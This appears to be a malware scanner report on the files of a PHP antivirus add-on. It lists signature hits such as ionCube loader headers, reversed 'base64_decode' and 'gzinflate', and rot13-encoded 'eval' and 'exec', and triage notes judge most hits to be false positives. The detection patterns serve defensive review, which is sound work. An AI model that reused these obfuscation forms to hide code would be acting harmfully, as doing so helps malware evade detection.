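Triage note: line 2092 is the same line reported in this table as `base64_long`, and this fragment appears inside that Base64 text (`…IkdMT0JBTFNb…`). The other signature hits on line 2092 (`aW5jbHVkZ`, `zeXN0ZW`) are likewise substrings of that one blob. The blob starts with the Base64 form of a PHP serialized-array header (`a:5:{s:10:"wizard.php"…`), which points to an embedded lookup table rather than executable code.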
| Sign 43b0d90f Line: 15587 Dangerous Malware Signature (hash: 43b0d90f) |
edoced_46esab
| Sign 43b0d90f Line: 15592 Dangerous Malware Signature (hash: 43b0d90f) |
etalfnizg
| Sign 43b0d90f Line: 18156 Dangerous Malware Signature (hash: 43b0d90f) |
Edoced_46esab
| Sign 4a069524 Line: 2092 Dangerous Malware Signature (hash: 4a069524) |
aW5jbHVkZ
| Sign 5c38b15f Line: 7232 Dangerous Malware Signature (hash: 5c38b15f) |
1337day.com
| Sign 7186bb8d Line: 8668 Dangerous Malware Signature (hash: 7186bb8d) |
rootkit
| Sign 7830f7a6 Line: 2081 Dangerous Malware Signature (hash: 7830f7a6) |
nVch
| Sign 963e968a Line: 13939 Dangerous Malware Signature (hash: 963e968a) |
PHPJiaMi
| Sign d97f004d Line: 2092 Dangerous Malware Signature (hash: d97f004d) |
zeXN0ZW
| Sign ee1cb326 Line: 2081 Dangerous Malware Signature (hash: ee1cb326) |
9wZw
| Sign f9dc0a55 Line: 12638 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
| Sign f9dc0a55 Line: 15707 Dangerous Malware Signature (hash: f9dc0a55) |
"base64_decode"
| Sign f9dc0a55 Line: 16983 Dangerous Malware Signature (hash: f9dc0a55) |
'" . base64_decode
| Sign f9dc0a55 Line: 18917 Dangerous Malware Signature (hash: f9dc0a55) |
'' . base64_decode
|
|
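//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/FilesMetaInfo.php Size: 5.51 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
Triage note: this file and the other scaforeSDK `lib/` files listed after it each report the same two matches, both on line 2 (`ioncube_loader` and `php_uname()`). That uniform pattern is what a shared encoder loader preamble would produce, so these findings most likely show only that the files are ionCube-encoded, not that each contains distinct suspicious code. Pattern matching cannot review the encoded body; compare checksums with the vendor's distribution to confirm the files are unmodified.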
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/FolderInfoFile.php Size: 8.61 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Version.php Size: 1.86 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Errors.php Size: 1.98 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/FoldersInfoStorage.php Size: 2.73 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/StatsReinfected.php Size: 6.02 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/StatsReturnCode.php Size: 5.78 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/BlacklistedDetails.php Size: 4.66 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/StatsAccumulated.php Size: 5.67 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/FilesMetaInfoStorage.php Size: 2.40 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/Stats.php Size: 2.11 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/StatsFullCured.php Size: 4.82 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/TaskManager.php Size: 8.63 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/ScanTaskParams.php Size: 6.28 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/ScanTask.php Size: 10.08 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/Task.php Size: 6.90 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
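| Function strrev exec_strrev Line: 60 Dangerous Encoded Function `exec` [https://www.php.net/exec]. The match is the four characters `CExE` (`exec` reversed, matched without regard to case) inside an ionCube-encoded file; in encoded data a match this short can occur by chance, so it needs confirmation on the vendor-original file. |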
CExE
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/UndoTask.php Size: 10.24 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/UndoTaskParams.php Size: 3.27 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/TaskParams.php Size: 5.06 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/CureTask.php Size: 12.89 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/CureTaskParams.php Size: 3.74 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Function str_rot13 eval_str_rot13 Line: 30 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
rinY
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Cli.php Size: 10.02 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/AntivirusTaskHelper.php Size: 7.39 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/GSB.php Size: 4.01 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/BlacklistedAbstract.php Size: 7.34 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/Openphish.php Size: 2.80 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/Spamhaus.php Size: 3.57 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/BlacklistedCache.php Size: 3.36 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/YSB.php Size: 2.83 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/Phishtank.php Size: 3.88 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/RequestManager.php Size: 13.20 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/FolderInfo.php Size: 28.01 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Stats/Accumulated.php Size: 12.07 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Stats/ReturnCode.php Size: 4.49 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Stats/StatsAbstract.php Size: 2.71 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Stats/Reinfected.php Size: 5.98 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Stats/Sender.php Size: 6.55 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/BackupHelper.php Size: 4.68 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Restore.php Size: 3.41 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Cure.php Size: 10.22 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Antivirus.php Size: 9.03 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/CureReport.php Size: 7.52 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Backup.php Size: 3.39 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Report.php Size: 2.60 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Mover.php Size: 7.87 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Scan.php Size: 12.99 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/ScanReport.php Size: 7.84 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Tools.php Size: 9.00 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Function str_rot13 exec_str_rot13 Line: 102 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
rKRp
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/autoload.php Size: 2.77 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/TaskManager.php Size: 8.61 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/KeyListStorage.php Size: 20.14 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Email/EmailSMTP.php Size: 12.03 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Email/Email.php Size: 3.14 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Email/EmailPHPMail.php Size: 2.95 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Queue.php Size: 9.17 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/System.php Size: 6.57 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
